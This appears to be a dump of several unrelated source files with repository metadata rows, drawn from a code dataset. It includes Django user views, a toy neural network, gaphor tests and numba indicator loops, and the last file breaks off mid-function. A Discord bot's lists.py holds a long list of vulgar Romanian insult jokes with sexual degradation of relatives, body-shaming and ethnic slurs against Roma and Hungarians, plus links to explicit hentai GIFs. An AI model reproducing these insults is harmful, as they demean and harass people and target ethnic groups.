                    + "\nBest chromosome: "
                    + str(self.pool[0].functional)
                    + "\n"
                    + str(self.pool[0].variance)
                )
                break
def main():
    """Entry point: run the multi-individual strategy with the configuration
    that gave the best experimental results."""
    # Code for strategy of 1 individual
    # ee = EvolutiveStrategyOneIndividual(c=ce, is10=True)
    # ee.trainingLoop(10000)
    # Code for strategy with the best results
    ee = EvolutiveStrategyMultiple(
        population=300, family_number=2, tournament_factor=0.05, is10=True
    )
    ee.training_cycle(1000, scaling=True)
# Run the experiment only when executed as a script, not on import.
if __name__ == "__main__":
    main()
| 35.135484 | 144 | 0.580487 |
3a8ac6ed77639549d9368218a7f979d0a6bcc7b7 | 1,638 | py | Python | src/arago/hiro/client/exception.py | 166MMX/hiro-python-library | fb29e3247a8fe1b0f7dc4e68141cf7340a8dd0a5 | [
"MIT"
] | null | null | null | src/arago/hiro/client/exception.py | 166MMX/hiro-python-library | fb29e3247a8fe1b0f7dc4e68141cf7340a8dd0a5 | [
"MIT"
] | null | null | null | src/arago/hiro/client/exception.py | 166MMX/hiro-python-library | fb29e3247a8fe1b0f7dc4e68141cf7340a8dd0a5 | [
"MIT"
] | null | null | null | from typing import Mapping, Any, List
class HiroClientError(Exception):
    """Base class for client-side errors raised by the HIRO client.

    The original defined an ``__init__`` that merely forwarded to
    ``Exception.__init__``; it was redundant and has been removed —
    behaviour is identical.
    """
class OntologyValidatorError(HiroClientError):
    """Raised when the HIRO ontology validator rejects a request.

    Parses the validator's error payload into the ``message``, ``warnings``
    and ``errors`` attributes.
    """

    message: str
    warnings: List[str]
    errors: List[str]

    def __init__(self, data: Mapping[str, Any]) -> None:
        super().__init__()
        # Expected payload (a KeyError propagates if the shape is wrong):
        # {'error': {'message': ..., 'result': {'warnings': [...], 'errors': [...]}}}
        payload = data['error']
        self.message = payload['message']
        details = payload['result']
        self.warnings = details['warnings']
        self.errors = details['errors']

    @staticmethod
    def is_validator_error(data: Mapping[str, Any]) -> bool:
        """Return True iff *data* has the exact shape of a validator-error
        payload (message 'validation failed' with list-typed warnings/errors).

        Example payload:
        {'error': {'message': 'validation failed',
                   'result': {'errors': ['attribute ogit/description is invalid'],
                              'warnings': []}}}
        """
        if 'error' not in data:
            return False
        payload = data['error']
        if 'message' not in payload or 'result' not in payload:
            return False
        details = payload['result']
        if payload['message'] != 'validation failed':
            return False
        if 'errors' not in details or 'warnings' not in details:
            return False
        return isinstance(details['warnings'], list) and isinstance(details['errors'], list)
class HiroServerError(Exception):
    """Raised when the HIRO server reports a server-side failure.

    The redundant pass-through ``__init__`` of the original has been
    removed; behaviour is identical to ``Exception``.
    """
| 27.762712 | 96 | 0.525031 |
3a8c95437dc709e3b0251893e5436db0d7890d0f | 8,098 | py | Python | yoongram/users/views.py | happyjy/yoonGram | 20555619721065296d5dab88e80c763b4a3f295e | [
"MIT"
] | null | null | null | yoongram/users/views.py | happyjy/yoonGram | 20555619721065296d5dab88e80c763b4a3f295e | [
"MIT"
] | 9 | 2021-03-09T02:00:36.000Z | 2022-02-26T10:13:36.000Z | yoongram/users/views.py | happyjy/yoonGram | 20555619721065296d5dab88e80c763b4a3f295e | [
"MIT"
] | null | null | null | from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from . import models, serializers
from yoongram.notifications import views as notifications_views
class ExploreUsers(APIView):
    """Return up to five users to suggest on the Explore page."""

    def get(self, request, format=None):
        suggestions = models.User.objects.all()[:5]
        payload = serializers.ListUsersSerializer(
            suggestions, many=True, context={"request": request}
        )
        return Response(data=payload.data, status=status.HTTP_200_OK)
class FollowUser(APIView):
    """Make the authenticated user follow another user and notify them."""

    def post(self, request, user_id, format=None):
        """POST -> 200 on success, 404 when *user_id* does not exist.

        Debug ``print`` calls of the original have been removed.
        """
        user = request.user
        try:
            user_to_follow = models.User.objects.get(id=user_id)
        except models.User.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        # https://docs.djangoproject.com/en/1.11/ref/models/relations/#django.db.models.fields.related.RelatedManager.add
        user.following.add(user_to_follow)
        user.save()
        # Create a 'follow' notification addressed to the followed user.
        notifications_views.create_notification(user, user_to_follow, 'follow')
        return Response(status=status.HTTP_200_OK)
class UnFollowUser(APIView):
    """Make the authenticated user unfollow another user."""

    def post(self, request, user_id, format=None):
        """POST -> 200 on success, 404 when *user_id* does not exist.

        Debug ``print`` calls of the original have been removed.
        """
        user = request.user
        try:
            user_to_unfollow = models.User.objects.get(id=user_id)
        except models.User.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        user.following.remove(user_to_unfollow)
        user.save()
        return Response(status=status.HTTP_200_OK)
class UserProfile(APIView):
    """Read (GET) and partially update (PUT) a profile addressed by username.

    Debug ``print`` statements and a stale commented-out serializer dump
    from the original have been removed; response behaviour is unchanged.
    """

    def get_user(self, username):
        """Return the User with *username*, or None if it does not exist."""
        try:
            found_user = models.User.objects.get(username=username)
            return found_user
        except models.User.DoesNotExist:
            return None

    def get(self, request, username, format=None):
        """GET the serialized profile -> 200, or 404 for an unknown username."""
        found_user = self.get_user(username)
        if found_user is None:
            return Response(status=status.HTTP_404_NOT_FOUND)
        serializer = serializers.UserProfileSerializer(found_user)
        return Response(data=serializer.data, status=status.HTTP_200_OK)

    def put(self, request, username, format=None):
        """Partially update the profile.

        Only the owner may edit their own profile: 404 for an unknown
        username, 400 when editing someone else's profile or when the
        payload fails validation, 200 with the updated data on success.
        """
        user = request.user
        found_user = self.get_user(username)
        if found_user is None:
            return Response(status=status.HTTP_404_NOT_FOUND)
        if found_user.username != user.username:
            # Editing somebody else's profile is forbidden.
            return Response(status=status.HTTP_400_BAD_REQUEST)
        serializer = serializers.UserProfileSerializer(
            found_user, data=request.data, partial=True)
        if serializer.is_valid():
            serializer.save()
            return Response(data=serializer.data, status=status.HTTP_200_OK)
        return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class UserFollowerUser(APIView):
    """List the followers of the user addressed by *username*."""

    def get(self, request, username, format=None):
        """GET -> 200 with the serialized followers, 404 for unknown username.

        Debug ``print`` calls of the original have been removed.
        """
        try:
            found_user = models.User.objects.get(username=username)
        except models.User.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        user_followers = found_user.followers.all()
        serializer = serializers.ListUsersSerializer(user_followers, many=True, context={"request": request})
        return Response(data=serializer.data, status=status.HTTP_200_OK)
# class Based Viwes
class UserFollowingUser(APIView):
    """List the users that the addressed user is following."""

    def get(self, request, username, format=None):
        """GET -> 200 with the serialized list, 404 for an unknown username."""
        try:
            found_user = models.User.objects.get(username=username)
        # Bug fix: the original caught ``models.User.DeosNotExist`` (typo),
        # which would raise AttributeError instead of returning 404.
        except models.User.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        user_following = found_user.following.all()
        serializer = serializers.ListUsersSerializer(user_following, many=True, context={"request": request})
        return Response(data=serializer.data, status=status.HTTP_200_OK)
# function Based Views
# views: path("<slug:username>/following/", view=views.UserFollowingUserFBV, name="user_profile")
# def UserFollowingFBV(request, username):
# if request.method == 'GET':
# try:
# found_user = models.User.objects.get(username=username)
# except models.User.DeosNotExist:
# return Response(status=status.HTTP_404_NOT_FOUND)
# user_following = found_user.following.all()
# serializer = serializers.ListUsersSerializer(user_following, many=True)
# return Response(data=serializer.data, status=status.HTTP_200_OK)
class Search(APIView):
    """Search users by username prefix: GET /users/search/?username=<prefix>."""

    def get(self, request, format=None):
        """200 with matching users, 400 when the query parameter is missing.

        Debug ``print`` calls of the original have been removed.
        """
        username = request.query_params.get('username', None)
        if username is None:
            return Response(status=status.HTTP_400_BAD_REQUEST)
        # Case-insensitive prefix match on the username.
        users = models.User.objects.filter(username__istartswith=username)
        serializer = serializers.ListUsersSerializer(users, many=True, context={"request": request})
        return Response(data=serializer.data, status=status.HTTP_200_OK)
class ChangePassword(APIView):
    """Let a user change their own password.

    Expects ``current_password`` and ``new_password`` in the request body.
    Every failure path (wrong user, missing field, wrong current password)
    yields 400; success yields 200.
    """

    def put(self, request, username, format=None):
        user = request.user
        # Only the owner of the account may change its password.
        if user.username != username:
            return Response(status=status.HTTP_400_BAD_REQUEST)
        # The current password must be supplied and must match the stored one.
        current_password = request.data.get('current_password', None)
        if current_password is None:
            return Response(status=status.HTTP_400_BAD_REQUEST)
        if not user.check_password(current_password):
            return Response(status=status.HTTP_400_BAD_REQUEST)
        # A new password must be supplied; persist it.
        new_password = request.data.get('new_password', None)
        if new_password is None:
            return Response(status=status.HTTP_400_BAD_REQUEST)
        user.set_password(new_password)
        user.save()
        return Response(status=status.HTTP_200_OK)
3a8cac712e69f85d4085b70791e0d285fbcb5630 | 2,507 | py | Python | BabysFirstNeuralNetwork/ToyNN.py | dwpicott/BasicNeuralNetwork | ad4f5878098e5ad167ee2280f5b9b03af02dfa27 | [
"MIT"
] | null | null | null | BabysFirstNeuralNetwork/ToyNN.py | dwpicott/BasicNeuralNetwork | ad4f5878098e5ad167ee2280f5b9b03af02dfa27 | [
"MIT"
] | null | null | null | BabysFirstNeuralNetwork/ToyNN.py | dwpicott/BasicNeuralNetwork | ad4f5878098e5ad167ee2280f5b9b03af02dfa27 | [
"MIT"
] | null | null | null | '''
Basic Python tutorial neural network.
Based on "A Neural Network in 11 Lines of Python" by i am trask
https://iamtrask.github.io/2015/07/12/basic-python-network/
'''
import numpy as np
class ToyNN(object):
    '''
    Minimal two-layer (input -> output) toy neural network trained by
    error-weighted gradient descent with a sigmoid activation.
    '''

    def __init__(self, inputs=3, outputs=1):
        # Layer sizes.
        self.inputs = inputs
        self.outputs = outputs
        # Synapse weights drawn uniformly from [-1, 1) (mean 0).
        self.synapseWeights = 2 * np.random.random((inputs, outputs)) - 1

    def Activation(self, x):
        '''Sigmoid activation function.'''
        return 1 / (1 + np.exp(-x))

    def ActivationPrime(self, x):
        '''Derivative of the sigmoid, expressed in terms of its output.'''
        return x * (1 - x)

    def FeedForward(self, input):
        '''Propagate *input* through the single weight layer.'''
        return self.Activation(np.dot(input, self.synapseWeights))

    def TrainNN(self, features, targets, iterations=10000):
        '''Fit the weights to (features, targets) over *iterations* passes.'''
        layer_in = features  # input layer
        for _ in range(iterations):
            prediction = self.FeedForward(layer_in)   # forward pass
            residual = targets - prediction           # prediction error
            # Weight the error by the sigmoid slope at each prediction.
            gradient = residual * self.ActivationPrime(prediction)
            # Accumulate the weight update.
            self.synapseWeights += np.dot(layer_in.T, gradient)
# Demo script: train the toy network on a tiny dataset where a 1 in the
# first input column directly correlates with a 1 in the output.
# training features
features = np.array([ [0, 0, 1],
                      [0, 1, 1],
                      [1, 0, 1],
                      [1, 1, 1] ])
# training targets
targets = np.array([ [0, 0, 1, 1] ]).T  # 4x1 matrix
# Seed random number generator so the weight initialisation is reproducible.
np.random.seed(1)
nn = ToyNN()
print("Training neural network...")
nn.TrainNN(features, targets)
print("Training complete.\n")
print("Input training set:")
# Bug fix: the original printed ``targets`` here, although the label says it
# is showing the input training set.
print(features)
print("Expected output:")
print(targets)
print("\nOutput from training set after 10000 iterations:")
print(nn.FeedForward(features))
print("\n==============================\n")
newData = np.array([ [0, 0, 0],
                     [0, 1, 0],
                     [1, 0, 0] ])
print("New input data:")
print(newData)
print("Expected output:")
print(np.array([ [0, 0, 1] ]).T)
print("\nOutput for new data not in the training set:")
print(nn.FeedForward(newData))
3a8dcfa7190ecc79bdaa94535eba0d246aff05b9 | 1,122 | py | Python | gaphor/UML/deployments/tests/test_connector.py | MartinIIOT/gaphor | b08bf6ddb8c92ec87fccabc2ddee697609f73e67 | [
"Apache-2.0"
] | null | null | null | gaphor/UML/deployments/tests/test_connector.py | MartinIIOT/gaphor | b08bf6ddb8c92ec87fccabc2ddee697609f73e67 | [
"Apache-2.0"
] | null | null | null | gaphor/UML/deployments/tests/test_connector.py | MartinIIOT/gaphor | b08bf6ddb8c92ec87fccabc2ddee697609f73e67 | [
"Apache-2.0"
] | null | null | null | import pytest
from gaphor import UML
from gaphor.core.modeling import Diagram
from gaphor.core.modeling.modelinglanguage import (
CoreModelingLanguage,
MockModelingLanguage,
)
from gaphor.SysML.modelinglanguage import SysMLModelingLanguage
from gaphor.UML.deployments.connector import ConnectorItem
from gaphor.UML.modelinglanguage import UMLModelingLanguage
@pytest.fixture
def modeling_language():
return MockModelingLanguage(
CoreModelingLanguage(), UMLModelingLanguage(), SysMLModelingLanguage()
)
def test_create(create):
"""Test creation of connector item."""
conn = create(ConnectorItem, UML.Connector)
assert conn.subject is not None
def test_persistence(create, element_factory, saver, loader):
"""Test connector item saving/loading."""
conn = create(ConnectorItem, UML.Connector)
end = element_factory.create(UML.ConnectorEnd)
conn.end = end
data = saver()
assert end.id in data
loader(data)
diagram = next(element_factory.select(Diagram))
assert diagram.select(ConnectorItem)
assert element_factory.lselect(UML.ConnectorEnd)
| 27.365854 | 78 | 0.762923 |
3a8e21c35da0565b1474e19643e2481a81691a35 | 14,317 | py | Python | utils/lists.py | luciano1337/legion-bot | 022d1ef9eb77a26b57929f800dd55770206f8852 | [
"MIT"
] | null | null | null | utils/lists.py | luciano1337/legion-bot | 022d1ef9eb77a26b57929f800dd55770206f8852 | [
"MIT"
] | null | null | null | utils/lists.py | luciano1337/legion-bot | 022d1ef9eb77a26b57929f800dd55770206f8852 | [
"MIT"
] | null | null | null | pozehug = [
'https://media1.tenor.com/images/4d89d7f963b41a416ec8a55230dab31b/tenor.gif?itemid=5166500',
'https://media1.tenor.com/images/c7efda563983124a76d319813155bd8e/tenor.gif?itemid=15900664',
'https://media1.tenor.com/images/daffa3b7992a08767168614178cce7d6/tenor.gif?itemid=15249774',
'https://media1.tenor.com/images/7e30687977c5db417e8424979c0dfa99/tenor.gif?itemid=10522729',
'https://media1.tenor.com/images/5ccc34d0e6f1dccba5b1c13f8539db77/tenor.gif?itemid=17694740'
]
raspunsuri = [
'Da', 'Nu', 'Ghiceste..', 'Absolut.',
'Desigur.', 'Fara indoiala fratimiu.',
'Cel mai probabil.', 'Daca vreau eu',
'Ajutor acest copil are iq-ul scazut!',
'https://i.imgur.com/9x18D5m.png',
'Sa speram', 'Posibil.',
'Ce vorbesti sampist cordit',
'Se prea poate', 'Atata poti cumetre',
'Daca doresc', 'Teapa cumetre',
'Milsugi grav', 'https://www.youtube.com/watch?v=1MwqNFO_rM4',
'Nu stiu ca nu sunt creativa', 'Nu stiu', 'Asa te-ai nascut bai asta', 'Yamete Kudasaiii.. ^_^', 'E prost dal in morti lui!',
'Nu il poti judeca.'
]
lovitura = [
'https://media1.tenor.com/images/9ea4fb41d066737c0e3f2d626c13f230/tenor.gif?itemid=7355956',
'https://media1.tenor.com/images/612e257ab87f30568a9449998d978a22/tenor.gif?itemid=16057834',
'https://media1.tenor.com/images/528ff731635b64037fab0ba6b76d8830/tenor.gif?itemid=17078255',
'https://media1.tenor.com/images/153b2f1bfd3c595c920ce60f1553c5f7/tenor.gif?itemid=10936993',
'https://media1.tenor.com/images/f9f121a46229ea904209a07cae362b3e/tenor.gif?itemid=7859254',
'https://media1.tenor.com/images/477821d58203a6786abea01d8cf1030e/tenor.gif?itemid=7958720'
]
pisica = [
'https://media1.tenor.com/images/730c85cb58041d4345404a67641fcd46/tenor.gif?itemid=4351869',
'https://media1.tenor.com/images/f78e68053fcaf23a6ba7fbe6b0b6cff2/tenor.gif?itemid=10614631',
'https://media1.tenor.com/images/8ab88b79885ab587f84cbdfbc3b87835/tenor.gif?itemid=15917800',
'https://media1.tenor.com/images/fea93362cd765a15b5b2f45fc6fca068/tenor.gif?itemid=14715148',
'https://media1.tenor.com/images/fb22e08583263754816e910f6a6ae4bd/tenor.gif?itemid=15310654',
'https://media1.tenor.com/images/9596d3118ddd5c600806a44da90c4863/tenor.gif?itemid=16014629',
'https://media1.tenor.com/images/ce038ac1010fa9514bb40d07c2dfed7b/tenor.gif?itemid=14797681',
'https://media1.tenor.com/images/4fbe2ab9d22992d0a42da37804f227e8/tenor.gif?itemid=9606395',
'https://media1.tenor.com/images/f6fe8d1d0463f4e51b6367bbecf56a3e/tenor.gif?itemid=6198981',
'https://media1.tenor.com/images/a862d2cb92bfbe6213e298871b1e8a9a/tenor.gif?itemid=15805236'
]
caini = [
''
]
pozehentai = [
'https://i.alexflipnote.dev/500ce4.gif',
'https://media1.tenor.com/images/832c34c525cc3b7dae850ce5e7ee451c/tenor.gif?itemid=9714277',
'https://media1.tenor.com/images/1169d1ab96669e13062c1b23ce5b9b01/tenor.gif?itemid=9035033',
'https://media1.tenor.com/images/583d46f95740b8dde76b47585d78f3a4/tenor.gif?itemid=19369487',
'https://media1.tenor.com/images/01b39c35fd1ce4bb6ce8be232c26d423/tenor.gif?itemid=12342539',
'https://media1.tenor.com/images/bd39500869eeedd72d94274282fd14f2/tenor.gif?itemid=9252323',
'https://media1.tenor.com/images/65c92e3932d7617146c7faab53e1063b/tenor.gif?itemid=11098571',
'https://media1.tenor.com/images/c344d38d1a2b799db53478b8ec302f9e/tenor.gif?itemid=14057537'
]
pozekiss = [
'https://media1.tenor.com/images/ef4a0bcb6e42189dc12ee55e0d479c54/tenor.gif?itemid=12143127',
'https://media1.tenor.com/images/f102a57842e7325873dd980327d39b39/tenor.gif?itemid=12392648',
'https://media1.tenor.com/images/3d56f6ef81e5c01241ff17c364b72529/tenor.gif?itemid=13843260',
'https://media1.tenor.com/images/503bb007a3c84b569153dcfaaf9df46a/tenor.gif?itemid=17382412',
'https://media1.tenor.com/images/6bd9c3ba3c06556935a452f0a3679ccf/tenor.gif?itemid=13387677',
'https://media1.tenor.com/images/f1dd2c4bade57949f49daeedbe3a4b86/tenor.gif?itemid=17092948'
]
lick = [
'https://media1.tenor.com/images/2ca4ca0d787ca3af4e27cdf71bb9796f/tenor.gif?itemid=15900645'
]
love = [
'https://media1.tenor.com/images/cf20ebeadcadcd54e6778dac16357644/tenor.gif?itemid=10805514'
]
pozegift = [
'https://i.imgur.com/xnHDSIb.jpg',
'https://i.imgur.com/uTrZDlC.jpg',
'https://i.imgur.com/fMgEDlZ.jpg',
'https://i.imgur.com/HZVKaYK.jpg',
'https://i.imgur.com/HvQnLpj.jpg',
'https://i.imgur.com/qRLPalh.jpg',
'https://i.imgur.com/fQaCCNF.jpg',
'https://i.imgur.com/BM8CoqI.jpg',
'https://i.imgur.com/bSTgzZj.jpg',
'https://i.imgur.com/bZOpa6H.jpg',
'https://i.imgur.com/xjHCbLq.jpg',
'https://i.imgur.com/pFn1b1H.jpg',
'https://i.imgur.com/wxA6Yhm.jpg',
'https://i.imgur.com/jw3ohim.jpg',
'https://i.imgur.com/cZOCcvO.jpg',
'https://i.imgur.com/dpDKiNh.jpg',
'https://i.imgur.com/MSmQjc2.jpg',
'https://i.imgur.com/8LXrQmy.jpg',
]
glumemafia = [
'bagameas pulan mata pleci la scoala cu 10lei an buzunar 5lei de drum 5 lei detigari trantimias pulan mata si ai figuri k ai jordani fake din targ si tricou armani luat de la turci k daca iti deschid sifonieru joak turci cu chinezi barbut',
'Cum plm sa iti ia mata telefonu adica dai un capac sa te stie de jupan',
'te lauzi ca stai la oras da tu stai in ultimu sat uitat de lume ciobanoaia cu 3 case si 2 se darama pisamas pe tn',
'Esti mare diva si ai 10k followeri pe insta da cand deschizi picioarele intreaba lumea cine a deschis punga de lotto cu cascaval',
'te dai mare fumator ca fumezi la narghilea si ai vape dar cand ti am zis de davidoff ai zis ca e ala cu ochelari din migos',
'Flexezi un tricou bape luat din obor cu 10 yang da il contactezi pe premieru chinei daca pui urechea la eticheta in rasa mati de saracie',
'cum frt nai auzit de adrian toma cel mai bun giungel wannabe de pa eune frt gen esti nub? :))))',
'gen cum morti mati sa te joci fortnite mai bine iesi afara si ti construiesti o casa ca si asa stai in pubela de gunoi :)))))))))',
'pui story ca mananci la restaurant meniuri scumpe si esti cu gagicatu mancati bn dar tie cand ti-am aratat prima oara pizza ai zis ca au scos astia de la rolex ceasuri cu salam pe el',
'ce corp ai zici ca e blenderu de facea reclama pe taraf la el',
'cand te am dus prima oara la kfc ai comandat parizer mentolat cu sos de lamaie',
'dai share la parazitii spui dalea cu cand soarele rasare am ochii injectati sau muie garda si dai share la poze cu maria si jointuri bai nebunule sa cada mie tot ce am pe casa de nu fumezi in spate la bloc cu batu ca daca afla mata aia descentrata iti fute o palma de singurul lucru pe care o sa il mai bagi in vene e perfuzia fututi morti mati ))))))',
'ho fa terminato cu fitele astea ca atunci cand te-am dus prima data la mc ai intrebat daca se poate manca cu mana',
'fa proasto te dai mare bad bici dar cand ti-am aratat h&m m-ai intrebat pe unde poti taia lemne',
'te crezi mare diva si iti faci poze pe masini si pe garduri da sa moara chilotii lu nelson daca te vede mata ca esti asa rebela iti fute un telefon nokia in cap de nu mai vezi orgoliul vreo 3 ani',
'fa andreio tiam dat felu 2 al meu la grădinița sa mănânci ca tiera foame siacu ai aruncat trandafiri fututen gura de stoarfa',
'Eu, Lorin Fortuna combatant ezoteric complex și corect privind din punct de vedere ezoteric prin rangul ezoteric precum și prin distincţiile ezoterice care mi-au fost conferite de către conducători supremi abilitaţi, blestem ezoteric la nivelul maxim posibil la care dau dreptul rangul și distinctiile ezoterice care mi-au conferite menţionate anterior. Blestem fără sfârşit temporar în mod direct împotriva fiinţei colective superioare de tip civilizaţie virtuală numită: civilizaţia virtuală arahnidica tarantulara, androgina, neagră, emoţional agresională civilizațională condusă la nivel de conducător suprem de către fiinţa superioară androgină alcătuită din: ființa individuală superioară de gen masculin numită Satanos și fiinţa individuală superioară de gen feminin numită Geea, pentru răul existenţial comis împotriva grupării de civilizaţie virtuale de tip gorilian individual neagresională civilizațional și autentic băștinașe în cadrul lumilor planetare ale planetei al cărei lume planetare medie sunt integrate existenţial cu precizarea că, răul existenţial pentru care blestem civilizaţia virtuală pe care am numit-o anterior ultim ca civilizaţie agresională civilizațional a fost comis în perioada temporală specifică calendarului planetar cuprins între data de început în care s-a dat în funcțiune oficial prima bază civilizațională planetară în cadrul zonei existenţiale a planetei a cărei lume planetară medie sunt integrate existențial aferentă și mă refer la zona existențial în cauză și la concret la baza existențială civilizațională virtuală planetară în cauza deci aferentă civilizației virtuale pe care o blestem și până în prezent.',
'fututi morti mati te dai mare smeker faci paneluri de samp da kand tiam zis de error_log ziceai sefu scuzama nam facut eu asa cv fututi morti mati olteanuadv',
'te dai mare futacios si mare fuckboy da singura fata careti zice so futi e reclama depe xnxx cu maria carei in apropierea ta',
'te dai bodybuilder ca tu faci sala sa pui pe tine da sami bag singur pulan cur ca dacati pui mana in sold zici ca esti cupa uefa esti nebun',
'cum sa te desparti de gagicata gen la inima mai ars dar tot nam sa te las',
'te dai mare smecher prin cluburi da cand era pe tv shaolin soudaun iti puneai manusa lu tac tu de sudura pe cap si ziceai ca e pumnu lu tedigong',
'Te dai mare ITst haker pula mea da nai mai trimis ss la nimeni de când ți ai spart ecranu la tlf că ți era rușine să nu se vadă damiaș drumu n pipota matii',
'pai daten mm de pizda proasta, pui ss cu samsung health la instastory si ne arati cati pasi ai facut tu de la shaormerie pana acasa sau din pat pana la frigider, si te lauzi ca faci sport? sport e cand o sugi si nuti oboseste gura.',
'sa o fut pe mata in gura pana ii perforez laringele',
'Cum sati fie frica de fantome gen scubi dubi du unde esti tu',
'cand ti am aratat prima oara narghileaua ai crezut ca e pompa si ai scos mingea so umflam pt diseara la fotbal',
'ce nas ai zici ca e racheta lu Trump cu care bombardeaza Siria',
'daca esti scunda si folosesti expresia "sunt mai aproape de iad", nu daten mortii mati esti mai aproape sa-mi faci masaj la prostata cu gura din picioare',
'BAGAMIAS PULAN MORTI TAI DITULE AI CORPU ALA ZICI CAI AMBALAJ DE LA IKEA',
'cum sa nu sti nimic despre masini gen am creieru tdi cu motor de 6 mii ))))))',
'sa vedeti cioroilor, azi dimineata stateam linistit in pat si il gadilam pe fratimio in talpa, la care mama "macar asteapta pana se naste", gen cplm nu pot sa ma joc cu el',
'pray pt toti cioroi care lea fost inima ranita de puicute stei strong barbati mei',
'Ho nebunule ca groapa marianelor si mata sunt cele mai adanci puncte de pe planeta',
'te dai mare diva figuri de buftea cu iph 6 da daca conectez castile la buricu tau se aude balada foamei bass boosted',
'cum pulamea sa nadormi vere gen noapte buna somn usor sapte purici pun picior',
'comentezi de bataie dar te sponsorizeaza croco cu corpu ala fmm de stick',
'buna ziua muie la bozgori si o seara cat mai linistita sa aveti oameni buni',
'Baganeam pula în profii de matematică o vezi pe Ionela ca are curu mare și îi pui 8 fututen gura si mie 5 luates in pula cu chelia ta',
'MAMA TA E ASA DE GRASA INCAT THANOS A BATUT DE 2 ORI DIN DEGETE SA O STEARGA DE PE PLANETA',
'esti frumoasa andreea da fara machiaj te striga lumea andrei pe strada',
'te dai mare smecher ca ai bani tu da dormi cu fratii tai pe rand in soba ca e frig afara pisa m as pe tn de sarantoc',
'vezi sa nu cazi in pumn baiatul meu ca poate te omori',
'Sa te fut in gura mort ca viu dai din picioare',
'Coaie te lauzi ca esti orasean ai vazut tranvaiu ai zis ca a fatat trenu copilu matii',
'ESTI ATAT DE URAT INCAT ATUNCI CAND PLANGI LACRIMILE SE INTALNESC LA CEAFA SA ITI OCOLEASCA FATA',
'Te dai mare culturist gen coaie ce spate am rup da sati scuipe unchiu Fester in ciorba mati de nu esti mai cocosat decat Rammus din lol in morti tai de ghertoi mars inapoi in papusoi',
'ma-ta aia curva cand imi vede pula zice "My precious" ca Gollum futu-ti rasa si neamu ma-tii de mamaligar',
'daca esti profesor si in timpul unei lucrari muti colegu ala mai bun din banca astfel incat ala mai prost sa nu poata copia meriti sa se prabuseasca pe tn si pe mata toate pulele pe care le a supt fieta sasi ia jordani la 3 milioane de pe olx',
'cand te am dus prima oara la pull&bear m ai intrebat unde i ursu',
'puneti poze cu bani pistoale si adidasi de la zanotti si valentino dar voi intrati in foame daca va scoate oferta de 5 lei combo de la mec',
'fmm ca te au dus astia la restaurant ca ai comandat ciorba si mancai cu furculita',
'am o dilema coaie, daca sperma are doar 7 calorii mata dc e obeza',
'Coaie ce prosti sunt straini cum plm sati dai 500-1000 eur pe un tricou guci cand in romania sunt la 10 sute 3 bucati ))))',
'Te lauzi ca tu ai geaca monclăr daia scumpa si nu ai ca saraci tai de colegi de la pull and bear dar ai uitat ca anu trecut venei cu hanorac de la decathlon cu pelerina de ploaie fmm de nemancata',
'cand te-am dus prima data la orange m-ai intrebat unde-s portocalele fmm de agricultor',
'cand ti am aratat prima oara o shaorma ai zis ca de ce mananc clatite cu carne si cartofi',
'Te dai mare gigolo dar ti se scoala pula cand se apleaca ma-ta',
'ia st ma sami pun la instastory o poza cu bautura gen sa vada urmaritori mei ca ma respect beau vin la 9,5 lei ca pana atunci singurul alcol care lai gustat a fost tuica de la pomana cand sa imbatat mata de ai duso cu roaba acasa luavas in pula mari smecheri ca puneti 5 inji 10 sute sa beti bohoarca',
'Am facut o lista cu aia cu care nu sa futut mata:',
'dai check-in zi de zi la cinema pui descriere "Another day another movie" da sa moara Toni Montana daca te mint ca acasa inca mai ai antena lu tactu mare de la tara si prinzi 5 canale de tvr 1 in 5 stiluri diferite',
'te dai mare gamerita esti tot cu #pcmasterrace dar cand mai vazut ca ma joc fifa mai intrebat unde a disparut digisport de sus din colt a dracu ascilopata',
'usor cu atitudinea de babygirl pe net ca in realitate ai trezit krakenu cu ragaitu ala posedato',
'coaie cum sa nu sti cum sa ai grija de o tarantula gen lol pela coaie pela pula'
]
| 91.775641 | 1,661 | 0.777607 |
3a8f0982e03b38e05aa03eb45840308eeb8e3dc5 | 3,730 | py | Python | py_ti/helper_loops.py | tlpcap/tlp_ti | 8d72b316b332fd5e20785dbf19401883958c0666 | [
"MIT"
] | 7 | 2021-01-31T19:23:07.000Z | 2022-03-10T21:22:41.000Z | py_ti/helper_loops.py | tlpcap/tlp_ti | 8d72b316b332fd5e20785dbf19401883958c0666 | [
"MIT"
] | null | null | null | py_ti/helper_loops.py | tlpcap/tlp_ti | 8d72b316b332fd5e20785dbf19401883958c0666 | [
"MIT"
] | null | null | null | import numpy as np
from numba import jit
@jit
def wilders_loop(data, n):
    """Smooth ``data`` in place with Wilder's moving average from index n on.

    Applies the classic recursion wma[i] = (wma[i-1] * (n - 1) + x[i]) / n,
    returning the mutated array.
    """
    for idx in range(n, len(data)):
        data[idx] = (data[idx - 1] * (n - 1) + data[idx]) / n
    return data
@jit
def kama_loop(data, sc, n_er, length):
    """Compute Kaufman's Adaptive Moving Average (KAMA).

    The series is seeded with the raw value at index ``n_er - 1`` and then
    follows the adaptive recursion kama[i] = kama[i-1] + sc[i] * (x[i] -
    kama[i-1]); entries before the seed stay NaN.
    """
    result = np.full(length, np.nan)
    result[n_er - 1] = data[n_er - 1]
    for idx in range(n_er, length):
        prev = result[idx - 1]
        result[idx] = prev + sc[idx] * (data[idx] - prev)
    return result
@jit
def psar_loop(psar, high, low, af_step, max_af):
    """Fill ``psar`` in place with Wilder's Parabolic Stop-and-Reverse.

    Parameters
    ----------
    psar : array pre-seeded with starting values; entries from index 2 on
        are overwritten with the computed SAR.
    high, low : per-bar extreme prices (same length as ``psar``).
    af_step : acceleration-factor increment (classically 0.02).
    max_af : acceleration-factor cap (classically 0.2).

    Returns the mutated ``psar`` array.

    FIX: the original also accumulated separate ``psar_up``/``psar_down``
    arrays that were never read or returned; that dead work is removed
    (the returned values are unchanged).
    """
    length = len(psar)
    uptrend = True              # start by assuming a rising trend
    af = af_step                # current acceleration factor
    high_point = high[0]        # extreme point of the current uptrend
    low_point = low[0]          # extreme point of the current downtrend
    for i in range(2, length):
        reversal = False
        if uptrend:
            # SAR accelerates toward the extreme of the current uptrend.
            psar[i] = psar[i-1] + af * (high_point - psar[i-1])
            if low[i] < psar[i]:
                # Price pierced the SAR: flip to a downtrend.
                reversal = True
                psar[i] = high_point
